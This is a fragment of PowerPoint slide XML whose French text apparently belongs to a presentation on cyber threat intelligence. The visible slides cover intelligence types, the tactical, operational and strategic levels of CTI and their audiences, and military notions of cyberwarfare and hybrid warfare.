            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881927" y="3002747"/>
            <a:ext cx="5692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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IMINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – renseignement des images (la collecte et l'analyse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des images visuelles)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DC6CE05-02B9-7983-62A0-293CD44DA487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285865" y="3738997"/>
            <a:ext cx="7179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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MASINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – renseignement sur les signaux et mesures (la collecte et l'analyse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de données provenant de capteurs -  nucléaire, chimique ou biologique)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1DAF83F-9289-8CAE-3CAE-8E67CA229504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857705" y="4504049"/>
            <a:ext cx="696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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GEOINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- renseignement géospatial (la collecte, l'analyse et visualisation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de données géospatiales)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5FB2E96-E246-A23D-53AF-372E13E60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4224F25-285B-57AE-9D0A-6A7CF6307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65AFAAD-5DED-BE12-0047-C3389BA2149D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377541" y="5270322"/>
            <a:ext cx="697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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FININT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – renseignement financier (l’analyse des transactions financières)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2F5A7E0-8CD6-BB20-6543-AC5DDDCB96D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972962" y="5732218"/>
            <a:ext cx="705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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OSINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – renseignement open-source (collecte et l'analyse d'informations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>provenant de sources publiques)</a:t>
            </a:r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3CEABE7-573C-68E1-C755-97050260A650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1867635"/>
            <a:ext cx="2143150" cy="1092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Typologie des cyber-renseignements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2524687"/>
            <a:ext cx="1514385" cy="35548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fr-FR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Processus de collecte, d'analyse, de distribution et d'échange d'informations sur les adversaires et les cyberattaques, utilisé pour renforcer la cybersécurité.</a:t>
            </a:r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26CFFF-7522-7D4C-F5CB-D9FBCEAB431F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065953" y="397893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2F4099-0A52-29E5-D674-053102173B1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674545" y="1867635"/>
            <a:ext cx="1922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     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TACTIQUE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOCs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOAs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Améliorer la détection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FB2E4A-D604-C38F-A517-383032C8653F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="968199" y="3194330"/>
            <a:ext cx="1553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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analystes SOC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analystes malware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92372B4-626D-7C39-8F6C-2931AAA6CEEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610904" y="4329757"/>
            <a:ext cx="2634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Quels sont les indicateurs,</a:t>
            </a:r>
          </a:p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les malwares, </a:t>
            </a:r>
          </a:p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les infrastructures</a:t>
            </a:r>
          </a:p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d’attaque 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6DC867-A57A-43B5-2D25-19BE51801D96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446554" y="1869532"/>
            <a:ext cx="23185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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OPERATIONNEL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Moyens adverses (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TTPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victimologie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Qui, Pourquoi, Comment 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A56B73-EDEE-0C4E-109B-9A18DFCC7ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769654" y="3077123"/>
            <a:ext cx="16723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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analystes CTI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Hunters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Responders</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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8A67D5-459B-B265-4609-B2E348C19868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3271937" y="4325018"/>
            <a:ext cx="2886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Où cette activité a été </a:t>
            </a:r>
          </a:p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observée ?</a:t>
            </a:r>
          </a:p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A quelle fréquence ?</a:t>
            </a:r>
          </a:p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Quelle est la cible ?</a:t>
            </a:r>
          </a:p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Caractéristiques communes?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93E1BE-FBB3-0F31-353D-544080791950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123359" y="1865904"/>
            <a:ext cx="2220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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STRATEGIQUE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tendances de haut niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Risques émergents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Décision stratégique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F2168ED-3B1C-3A25-9FD0-12221E43DCD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6713458" y="3220020"/>
            <a:ext cx="1165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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CISO,CIO,CTO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exécutif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A9AEAB0-0418-84C3-5D91-0B9D253B1709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5991232" y="4325018"/>
            <a:ext cx="2666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Qui a les moyens, le motif </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et l'opportunité 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BB96C7-A080-9A2E-DBE0-F05C22F7FF09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="1867635"/>
            <a:ext cx="2143150" cy="1092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25C811-824C-59F2-4D63-C82F5C3174A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123359" y="1865904"/>
            <a:ext cx="2346096" cy="1092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6267B8D1-6422-BF53-B4E9-71EA71383C59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="3861048"/>
            <a:ext cx="317900" cy="391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582B3901-AB64-C31E-41E6-4F69254D4168}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4338085" y="3833169"/>
            <a:ext cx="317900" cy="391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4C1E5834-2635-2FD6-FB84-9FB1192268AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7137456" y="3861047"/>
            <a:ext cx="317900" cy="391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39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CTI - le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>discours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09.06.2023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0357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Environnement conflictuel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E6ED23-8832-7496-81EF-4146EB79CE05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271897" y="2142313"/>
            <a:ext cx="671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L’état conflictuel – est caractérisé par l’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>activité adverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des opposants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D2C927-1BC7-7F89-0EDF-5031276C8967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="2924944"/>
            <a:ext cx="5666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Omniprésent dans l’histoire de l’humanité </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	– moteur de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pensée stratégique (« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>warfare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> »)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E6B4F94-B468-C69F-3BB6-C9C465A2F86A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="3861048"/>
            <a:ext cx="4011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Mise en exergue par la notion d’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intérêt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	- de group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	- social</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	- économique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	- géopolitique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396510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Environnement cyber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D1205F-4E35-CAD0-825A-9B3CFADF3080}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754733" y="1851894"/>
            <a:ext cx="7745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La doctrine militaire (dicte la stratégie) énumère </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 domaines de la guerre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>warfare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ») - environnements opérationnels distincts dans lesquels </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les forces opèrent et engagent l'ennemi (« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>theater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>operations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> »)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B30702-4DC1-E9F6-F92D-8F9C7D8AC57C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="34290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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TERRE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2F0D9D-9325-2E6C-5EEC-49725491EB56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="3429000"/>
            <a:ext cx="93610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2E6AD73-9A15-720D-70E3-CE202EF24FA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3938129" y="3429705"/>
            <a:ext cx="72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35AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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07AB9A-EA6C-1BB4-F513-C6A94B97856A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3915476" y="3437708"/>
            <a:ext cx="79208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0B4254-C402-4C81-1FC9-0C642AF6B351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020272" y="34290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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AIR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DA8930-8A39-3CD8-FA31-C61081B4846B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020272" y="3421368"/>
            <a:ext cx="648072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D3020F3-04F7-B0B8-927C-9D8B8F7FF1E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323399" y="4925344"/>
            <a:ext cx="88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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ESPACE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EB7C5F-2637-D070-0451-769EBC9D5878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243094" y="4925344"/>
            <a:ext cx="949389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E41A462-A008-8E11-5DD7-FCEE58092348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5299246" y="492770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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CYBER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A1605E-9DFC-C0C0-BA42-3F41FCCE51B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5322646" y="4931913"/>
            <a:ext cx="875463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B68DD9-F2F1-2380-E1DE-B9E3802DA828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220072" y="4797152"/>
            <a:ext cx="108012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A3799B1-E99D-FC5A-4B74-C965BCA241BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5032721" y="4056318"/>
            <a:ext cx="14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35AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cyberwarfare</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill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EC4C568-84C2-FFEF-8B61-7EA4AE1FEE4E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5760132" y="4425650"/>
            <a:ext cx="0" cy="371502"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100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365252A-6904-6121-6513-B6E82FEF04D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754733" y="2996952"/>
            <a:ext cx="7489675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7233F38-0256-8B62-B343-82C1806EA036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843024" y="2968569"/>
            <a:ext cx="162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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guerre hybride</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1968512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Cyber guerre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955FA4-C7DB-725B-F158-70A232D1301F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679230" y="1670112"/>
            <a:ext cx="776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Utilisation de systèmes informatiques, de réseaux et de technologies de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l'information pour mener des opérations et d'atteindre des objectifs stratégiques.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73D8AC-035A-CD68-6C43-582A9B9EB419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="2996952"/>
            <a:ext cx="7158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fr-FR" i="1" dirty="0">
